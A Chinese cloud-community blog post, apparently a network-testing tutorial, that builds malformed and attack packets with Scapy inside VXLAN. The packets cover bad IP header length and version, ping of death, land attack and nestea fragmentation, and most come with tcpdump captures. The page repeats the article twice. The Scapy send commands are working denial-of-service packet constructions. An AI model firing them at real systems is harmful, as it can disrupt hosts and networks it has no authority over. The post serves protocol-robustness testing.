活动

天翼云最新优惠活动,涵盖免费试用,产品折扣等,助您降本增效!
热门活动
免费活动
  • 活动
  • 产品
  • 解决方案
  • 应用商城
  • 合作伙伴
  • 开发者
  • 算力套餐
  • 支持与服务
  • 了解天翼云
searchusermenu
  • 发布文章
  • 消息中心
点赞
收藏
评论
分享
原创

典型网络畸形包/攻击报文的构造和验证

渗透测试
2023-10-16 07:25:08
128
0

 

常见网络畸形包

畸形包:

常见的比如不符合规范和裸机的报文,字段错误。

  • ip头的lenth小于20字节(ihl<5)

  • ip头的version不为4(version!=4)

其他攻击报文

  • ping of death

    构造icmp报文大于64k ,ping在操作系统内很常见,而单个包的长度超过了IP协议规范所规定的长度,很容易导致系统处理异常,进入非正常状态,属于典型的缓存溢出(Buffer Overflow)攻击

  • 圣诞树攻击

    将tcp报文的标志位均置为1,这回导致收到报文的网络协议栈需要比较复杂的处理这个数据包,耗费资源比较多,因此也可以用作模拟DOS攻击。

  • land attach

    Local Area Network Denial attack 局域网拒绝服务攻击,相同源地址和目标地址的欺骗攻击的数据包。

  • ip分片包的碎片攻击(nestea attach,teardrop attach)

使用scapy 构造对应的畸形包。

ip头的len小于20字节

# scapy
INFO: Can't import python gnuplot wrapper . Won't be able to plot.
INFO: Can't import PyX. Won't be able to use psdump() or pdfdump().
WARNING: No route found for IPv6 destination :: (no default route?)
INFO: Can't import python Crypto lib. Won't be able to decrypt WEP.
INFO: Can't import python Crypto lib. Disabled certificate manipulation tools
IGMPv3  is still under development - Nov 2010
Welcome to Scapy (2.3.2)
>>> p = Ether()/IP(dst="90.118.4.2",src="132.132.15.11")/UDP(dport=4789,sport=12345)/VXLAN(vni=3000)/Ether(src="4a:4f:c9:f6:a6:67", dst="3c:fd:fe:29:cb:c2")/IP(src="172.0.0.1", dst="172.0.0.2", ihl=2)
>>> sendp(p)

  • 抓包:

[root@16_2_7_132 ~]# tcpdump -ni eth4 -vnnvvvppp
tcpdump: WARNING: eth4: no IPv4 address assigned
tcpdump: listening on eth4, link-type EN10MB (Ethernet), capture size 65535 bytes
15:00:33.177988 IP (tos 0x0, ttl 64, id 1, offset 0, flags [none], proto UDP (17), length 70)
    132.132.15.11.12345 > 90.118.4.2.4789: [udp sum ok] VXLAN, flags [I] (0x08), vni 3000
IP bad-hlen 8
15:00:33.178060 IP (tos 0x0, ttl 254, id 43386, offset 0, flags [none], proto UDP (17), length 70)
    90.118.4.2.11420 > 132.132.15.12.4789: [udp sum ok] VXLAN, flags [I] (0x08), vni 3000
IP bad-hlen 8

ip头version不正确

>>> p = Ether()/IP(dst="90.118.4.2",src="132.132.15.11")/UDP(dport=4789,sport=12345)/VXLAN(vni=3000)/Ether(src="4a:4f:c9:f6:a6:67", dst="3c:fd:fe:29:cb:c2")/IP(src="172.0.0.1", dst="172.0.0.2", version=20)
>>> sendp(p)
Sent 1 packets.

  • 抓包

15:04:53.161971 IP (tos 0x0, ttl 64, id 1, offset 0, flags [none], proto UDP (17), length 70)
    132.132.15.11.12345 > 90.118.4.2.4789: [udp sum ok] VXLAN, flags [I] (0x08), vni 3000
IP (tos 0x0, ttl 64, id 1, offset 0, flags [none], proto Options (0), length 20)
    172.0.0.1 > 172.0.0.2:  ip-proto-0 0
15:04:53.162053 IP (tos 0x0, ttl 254, id 43391, offset 0, flags [none], proto UDP (17), length 70)
    90.118.4.2.11420 > 132.132.15.12.4789: [udp sum ok] VXLAN, flags [I] (0x08), vni 3000
IP (tos 0x0, ttl 64, id 1, offset 0, flags [none], proto Options (0), length 20)
    172.0.0.1 > 172.0.0.2:  ip-proto-0 0
15:04:53.162069 IP (tos 0x0, ttl 64, id 7443, offset 0, flags [none], proto UDP (17), length 98)
    132.132.15.12.45575 > 90.118.4.2.4789: [bad udp cksum 0xf267 -> 0x0f5e!] VXLAN, flags [I] (0x08), vni 3000
IP (tos 0xc0, ttl 64, id 64074, offset 0, flags [none], proto ICMP (1), length 48)
    172.0.0.2 > 172.0.0.1: ICMP 172.0.0.2 protocol 0 unreachable, length 28
        IP (tos 0x0, ttl 64, id 1, offset 0, flags [none], proto Options (0), length 20)
    172.0.0.1 > 172.0.0.2:  ip-proto-0 0
15:04:53.162118 IP (tos 0x0, ttl 254, id 12426, offset 0, flags [none], proto UDP (17), length 98)
    90.118.4.2.27772 > 132.132.15.11.4789: [udp sum ok] VXLAN, flags [I] (0x08), vni 3000
IP (tos 0xc0, ttl 64, id 64074, offset 0, flags [none], proto ICMP (1), length 48)
    172.0.0.2 > 172.0.0.1: ICMP 172.0.0.2 protocol 0 unreachable, length 28
        IP (tos 0x0, ttl 64, id 1, offset 0, flags [none], proto Options (0), length 20)
    172.0.0.1 > 172.0.0.2:  ip-proto-0 0

ping of death

>>> p = Ether()/IP(dst="90.118.4.2",src="132.132.15.11")/UDP(dport=4789,sport=12345)/VXLAN(vni=3000)
>>> d = fragment(IP(dst="172.0.0.2", src="172.0.0.1")/ICMP()/"X"*70000)
>>> cl = [p/i for i in d]
>>> sendp(cl)

ping of death 构造的包量较大,抓包不在此展示。

圣诞树攻击

 

land attach

>>> p = Ether()/IP(dst="90.118.4.2",src="132.132.15.11")/UDP(dport=4789,sport=12345)/VXLAN(vni=3000)/Ether(src="4a:4f:c9:f6:a6:67", dst="3c:fd:fe:29:cb:c2")/IP(src="172.0.0.2", dst="172.0.0.2")
>>> sendp(p)
.
Sent 1 packets.

  • 抓包

15:27:30.334034 IP (tos 0x0, ttl 64, id 1, offset 0, flags [none], proto UDP (17), length 70)
    132.132.15.11.12345 > 90.118.4.2.4789: [udp sum ok] VXLAN, flags [I] (0x08), vni 3000
IP (tos 0x0, ttl 64, id 1, offset 0, flags [none], proto Options (0), length 20)
    172.0.0.2 > 172.0.0.2:  ip-proto-0 0
15:27:30.334134 IP (tos 0x0, ttl 254, id 55255, offset 0, flags [none], proto UDP (17), length 70)
    90.118.4.2.63063 > 132.132.15.12.4789: [udp sum ok] VXLAN, flags [I] (0x08), vni 3000
IP (tos 0x0, ttl 64, id 1, offset 0, flags [none], proto Options (0), length 20)
    172.0.0.2 > 172.0.0.2:  ip-proto-0 0

nestea attach

>>> d1 = IP(dst="172.0.0.2", src="172.0.0.1", id=42, flags="MF")/UDP()/("x"*10)
>>> d2 = IP(dst="172.0.0.2", src="172.0.0.1", id=42, frag=48)/("x"*116)
>>> d3 = IP(dst="172.0.0.2", src="172.0.0.1", id=42, flags="MF")/UDP()/("x"*224)
>>> p = Ether()/IP(dst="90.118.4.2",src="132.132.15.11")/UDP(dport=4789,sport=12345)/VXLAN(vni=3000)/Ether(src="4a:4f:c9:f6:a6:67", dst="3c:fd:fe:29:cb:c2")
>>> cl = [p/d for d in [d1, d2, d3]]
>>> sendp(cl)
...
Sent 3 packets.

  • 抓包

15:32:28.517276 IP (tos 0x0, ttl 64, id 1, offset 0, flags [none], proto UDP (17), length 88)
    132.132.15.11.12345 > 90.118.4.2.4789: [udp sum ok] VXLAN, flags [I] (0x08), vni 3000
IP (tos 0x0, ttl 64, id 42, offset 0, flags [+], proto UDP (17), length 38)
    172.0.0.1.53 > 172.0.0.2.53: [|domain]
15:32:28.517323 IP (tos 0x0, ttl 254, id 15635, offset 0, flags [none], proto UDP (17), length 88)
    90.118.4.2.16600 > 132.132.15.12.4789: [udp sum ok] VXLAN, flags [I] (0x08), vni 3000
IP (tos 0x0, ttl 64, id 42, offset 0, flags [+], proto UDP (17), length 38)
    172.0.0.1.53 > 172.0.0.2.53: [|domain]
15:32:28.519304 IP (tos 0x0, ttl 64, id 1, offset 0, flags [none], proto UDP (17), length 186)
    132.132.15.11.12345 > 90.118.4.2.4789: [udp sum ok] VXLAN, flags [I] (0x08), vni 3000
IP (tos 0x0, ttl 64, id 42, offset 384, flags [none], proto Options (0), length 136)
    172.0.0.1 > 172.0.0.2: ip-proto-0
15:32:28.519331 IP (tos 0x0, ttl 254, id 43392, offset 0, flags [none], proto UDP (17), length 186)
    90.118.4.2.11420 > 132.132.15.12.4789: [udp sum ok] VXLAN, flags [I] (0x08), vni 3000
IP (tos 0x0, ttl 64, id 42, offset 384, flags [none], proto Options (0), length 136)
    172.0.0.1 > 172.0.0.2: ip-proto-0
15:32:28.521297 IP (tos 0x0, ttl 64, id 1, offset 0, flags [none], proto UDP (17), length 302)
    132.132.15.11.12345 > 90.118.4.2.4789: [udp sum ok] VXLAN, flags [I] (0x08), vni 3000
IP (tos 0x0, ttl 64, id 42, offset 0, flags [+], proto UDP (17), length 252)
    172.0.0.1.53 > 172.0.0.2.53: 30840 zoneRef% [b2&3=0x7878] [30840a] [30840q] [30840n] [30840au][|domain]
15:32:28.521330 IP (tos 0x0, ttl 254, id 15636, offset 0, flags [none], proto UDP (17), length 302)
    90.118.4.2.16600 > 132.132.15.12.4789: [udp sum ok] VXLAN, flags [I] (0x08), vni 3000
IP (tos 0x0, ttl 64, id 42, offset 0, flags [+], proto UDP (17), length 252)
    172.0.0.1.53 > 172.0.0.2.53: 30840 zoneRef% [b2&3=0x7878] [30840a] [30840q] [30840n] [30840au][|domain]

版权声明:本文内容系天翼云实名用户自发贡献,版权归原作者所有,天翼云开发者社区不拥有其著作权,亦不承担相应法律责任,未经许可,不得转载。

如有疑问或争议,请联系ctyunbbs@chinatelecom.cn删除。

0条评论
0 / 1000
飞机马耳朵
2文章数
0粉丝数
飞机马耳朵
2 文章 | 0 粉丝
Ta的热门文章查看更多
通过SCAPY实践天翼云组播典型网络畸形包/攻击报文的构造和验证
飞机马耳朵
2文章数
0粉丝数
飞机马耳朵
2 文章 | 0 粉丝
原创

典型网络畸形包/攻击报文的构造和验证

渗透测试
2023-10-16 07:25:08
128
0

 

常见网络畸形包

畸形包:

常见的比如不符合规范和裸机的报文,字段错误。

  • ip头的lenth小于20字节(ihl<5)

  • ip头的version不为4(version!=4)

其他攻击报文

  • ping of death

    构造icmp报文大于64k ,ping在操作系统内很常见,而单个包的长度超过了IP协议规范所规定的长度,很容易导致系统处理异常,进入非正常状态,属于典型的缓存溢出(Buffer Overflow)攻击

  • 圣诞树攻击

    将tcp报文的标志位均置为1,这回导致收到报文的网络协议栈需要比较复杂的处理这个数据包,耗费资源比较多,因此也可以用作模拟DOS攻击。

  • land attach

    Local Area Network Denial attack 局域网拒绝服务攻击,相同源地址和目标地址的欺骗攻击的数据包。

  • ip分片包的碎片攻击(nestea attach,teardrop attach)

使用scapy 构造对应的畸形包。

ip头的len小于20字节

# scapy
INFO: Can't import python gnuplot wrapper . Won't be able to plot.
INFO: Can't import PyX. Won't be able to use psdump() or pdfdump().
WARNING: No route found for IPv6 destination :: (no default route?)
INFO: Can't import python Crypto lib. Won't be able to decrypt WEP.
INFO: Can't import python Crypto lib. Disabled certificate manipulation tools
IGMPv3  is still under development - Nov 2010
Welcome to Scapy (2.3.2)
>>> p = Ether()/IP(dst="90.118.4.2",src="132.132.15.11")/UDP(dport=4789,sport=12345)/VXLAN(vni=3000)/Ether(src="4a:4f:c9:f6:a6:67", dst="3c:fd:fe:29:cb:c2")/IP(src="172.0.0.1", dst="172.0.0.2", ihl=2)
>>> sendp(p)

  • 抓包:

[root@16_2_7_132 ~]# tcpdump -ni eth4 -vnnvvvppp
tcpdump: WARNING: eth4: no IPv4 address assigned
tcpdump: listening on eth4, link-type EN10MB (Ethernet), capture size 65535 bytes
15:00:33.177988 IP (tos 0x0, ttl 64, id 1, offset 0, flags [none], proto UDP (17), length 70)
    132.132.15.11.12345 > 90.118.4.2.4789: [udp sum ok] VXLAN, flags [I] (0x08), vni 3000
IP bad-hlen 8
15:00:33.178060 IP (tos 0x0, ttl 254, id 43386, offset 0, flags [none], proto UDP (17), length 70)
    90.118.4.2.11420 > 132.132.15.12.4789: [udp sum ok] VXLAN, flags [I] (0x08), vni 3000
IP bad-hlen 8

ip头version不正确

>>> p = Ether()/IP(dst="90.118.4.2",src="132.132.15.11")/UDP(dport=4789,sport=12345)/VXLAN(vni=3000)/Ether(src="4a:4f:c9:f6:a6:67", dst="3c:fd:fe:29:cb:c2")/IP(src="172.0.0.1", dst="172.0.0.2", version=20)
>>> sendp(p)
Sent 1 packets.

  • 抓包

15:04:53.161971 IP (tos 0x0, ttl 64, id 1, offset 0, flags [none], proto UDP (17), length 70)
    132.132.15.11.12345 > 90.118.4.2.4789: [udp sum ok] VXLAN, flags [I] (0x08), vni 3000
IP (tos 0x0, ttl 64, id 1, offset 0, flags [none], proto Options (0), length 20)
    172.0.0.1 > 172.0.0.2:  ip-proto-0 0
15:04:53.162053 IP (tos 0x0, ttl 254, id 43391, offset 0, flags [none], proto UDP (17), length 70)
    90.118.4.2.11420 > 132.132.15.12.4789: [udp sum ok] VXLAN, flags [I] (0x08), vni 3000
IP (tos 0x0, ttl 64, id 1, offset 0, flags [none], proto Options (0), length 20)
    172.0.0.1 > 172.0.0.2:  ip-proto-0 0
15:04:53.162069 IP (tos 0x0, ttl 64, id 7443, offset 0, flags [none], proto UDP (17), length 98)
    132.132.15.12.45575 > 90.118.4.2.4789: [bad udp cksum 0xf267 -> 0x0f5e!] VXLAN, flags [I] (0x08), vni 3000
IP (tos 0xc0, ttl 64, id 64074, offset 0, flags [none], proto ICMP (1), length 48)
    172.0.0.2 > 172.0.0.1: ICMP 172.0.0.2 protocol 0 unreachable, length 28
        IP (tos 0x0, ttl 64, id 1, offset 0, flags [none], proto Options (0), length 20)
    172.0.0.1 > 172.0.0.2:  ip-proto-0 0
15:04:53.162118 IP (tos 0x0, ttl 254, id 12426, offset 0, flags [none], proto UDP (17), length 98)
    90.118.4.2.27772 > 132.132.15.11.4789: [udp sum ok] VXLAN, flags [I] (0x08), vni 3000
IP (tos 0xc0, ttl 64, id 64074, offset 0, flags [none], proto ICMP (1), length 48)
    172.0.0.2 > 172.0.0.1: ICMP 172.0.0.2 protocol 0 unreachable, length 28
        IP (tos 0x0, ttl 64, id 1, offset 0, flags [none], proto Options (0), length 20)
    172.0.0.1 > 172.0.0.2:  ip-proto-0 0

ping of death

>>> p = Ether()/IP(dst="90.118.4.2",src="132.132.15.11")/UDP(dport=4789,sport=12345)/VXLAN(vni=3000)
>>> d = fragment(IP(dst="172.0.0.2", src="172.0.0.1")/ICMP()/"X"*70000)
>>> cl = [p/i for i in d]
>>> sendp(cl)

ping of death 构造的包量较大,抓包不在此展示。

圣诞树攻击

 

land attach

>>> p = Ether()/IP(dst="90.118.4.2",src="132.132.15.11")/UDP(dport=4789,sport=12345)/VXLAN(vni=3000)/Ether(src="4a:4f:c9:f6:a6:67", dst="3c:fd:fe:29:cb:c2")/IP(src="172.0.0.2", dst="172.0.0.2")
>>> sendp(p)
.
Sent 1 packets.

  • 抓包

15:27:30.334034 IP (tos 0x0, ttl 64, id 1, offset 0, flags [none], proto UDP (17), length 70)
    132.132.15.11.12345 > 90.118.4.2.4789: [udp sum ok] VXLAN, flags [I] (0x08), vni 3000
IP (tos 0x0, ttl 64, id 1, offset 0, flags [none], proto Options (0), length 20)
    172.0.0.2 > 172.0.0.2:  ip-proto-0 0
15:27:30.334134 IP (tos 0x0, ttl 254, id 55255, offset 0, flags [none], proto UDP (17), length 70)
    90.118.4.2.63063 > 132.132.15.12.4789: [udp sum ok] VXLAN, flags [I] (0x08), vni 3000
IP (tos 0x0, ttl 64, id 1, offset 0, flags [none], proto Options (0), length 20)
    172.0.0.2 > 172.0.0.2:  ip-proto-0 0

nestea attach

>>> d1 = IP(dst="172.0.0.2", src="172.0.0.1", id=42, flags="MF")/UDP()/("x"*10)
>>> d2 = IP(dst="172.0.0.2", src="172.0.0.1", id=42, frag=48)/("x"*116)
>>> d3 = IP(dst="172.0.0.2", src="172.0.0.1", id=42, flags="MF")/UDP()/("x"*224)
>>> p = Ether()/IP(dst="90.118.4.2",src="132.132.15.11")/UDP(dport=4789,sport=12345)/VXLAN(vni=3000)/Ether(src="4a:4f:c9:f6:a6:67", dst="3c:fd:fe:29:cb:c2")
>>> cl = [p/d for d in [d1, d2, d3]]
>>> sendp(cl)
...
Sent 3 packets.

  • 抓包

15:32:28.517276 IP (tos 0x0, ttl 64, id 1, offset 0, flags [none], proto UDP (17), length 88)
    132.132.15.11.12345 > 90.118.4.2.4789: [udp sum ok] VXLAN, flags [I] (0x08), vni 3000
IP (tos 0x0, ttl 64, id 42, offset 0, flags [+], proto UDP (17), length 38)
    172.0.0.1.53 > 172.0.0.2.53: [|domain]
15:32:28.517323 IP (tos 0x0, ttl 254, id 15635, offset 0, flags [none], proto UDP (17), length 88)
    90.118.4.2.16600 > 132.132.15.12.4789: [udp sum ok] VXLAN, flags [I] (0x08), vni 3000
IP (tos 0x0, ttl 64, id 42, offset 0, flags [+], proto UDP (17), length 38)
    172.0.0.1.53 > 172.0.0.2.53: [|domain]
15:32:28.519304 IP (tos 0x0, ttl 64, id 1, offset 0, flags [none], proto UDP (17), length 186)
    132.132.15.11.12345 > 90.118.4.2.4789: [udp sum ok] VXLAN, flags [I] (0x08), vni 3000
IP (tos 0x0, ttl 64, id 42, offset 384, flags [none], proto Options (0), length 136)
    172.0.0.1 > 172.0.0.2: ip-proto-0
15:32:28.519331 IP (tos 0x0, ttl 254, id 43392, offset 0, flags [none], proto UDP (17), length 186)
    90.118.4.2.11420 > 132.132.15.12.4789: [udp sum ok] VXLAN, flags [I] (0x08), vni 3000
IP (tos 0x0, ttl 64, id 42, offset 384, flags [none], proto Options (0), length 136)
    172.0.0.1 > 172.0.0.2: ip-proto-0
15:32:28.521297 IP (tos 0x0, ttl 64, id 1, offset 0, flags [none], proto UDP (17), length 302)
    132.132.15.11.12345 > 90.118.4.2.4789: [udp sum ok] VXLAN, flags [I] (0x08), vni 3000
IP (tos 0x0, ttl 64, id 42, offset 0, flags [+], proto UDP (17), length 252)
    172.0.0.1.53 > 172.0.0.2.53: 30840 zoneRef% [b2&3=0x7878] [30840a] [30840q] [30840n] [30840au][|domain]
15:32:28.521330 IP (tos 0x0, ttl 254, id 15636, offset 0, flags [none], proto UDP (17), length 302)
    90.118.4.2.16600 > 132.132.15.12.4789: [udp sum ok] VXLAN, flags [I] (0x08), vni 3000
IP (tos 0x0, ttl 64, id 42, offset 0, flags [+], proto UDP (17), length 252)
    172.0.0.1.53 > 172.0.0.2.53: 30840 zoneRef% [b2&3=0x7878] [30840a] [30840q] [30840n] [30840au][|domain]

版权声明:本文内容系天翼云实名用户自发贡献,版权归原作者所有,天翼云开发者社区不拥有其著作权,亦不承担相应法律责任,未经许可,不得转载。

如有疑问或争议,请联系ctyunbbs@chinatelecom.cn删除。

文章来自个人专栏
云网络测试与实践
2 文章 | 1 订阅
0条评论
0 / 1000
请输入你的评论
0
0
售前咨询热线
400-810-9889转1
关注天翼云
  • 天翼云微信公众号
  • APP
    天翼云APP
服务与支持
账户管理
快速入口
云网生态
了解天翼云
热门产品
热门推荐
更多推荐
友情链接
©2024 天翼云科技有限公司版权所有 增值电信业务经营许可证A2.B1.B2-20090001
公司地址:北京市东城区青龙胡同甲1号、3号2幢2层205-32室
备案京公网安备11010802043424号京ICP备 2021034386号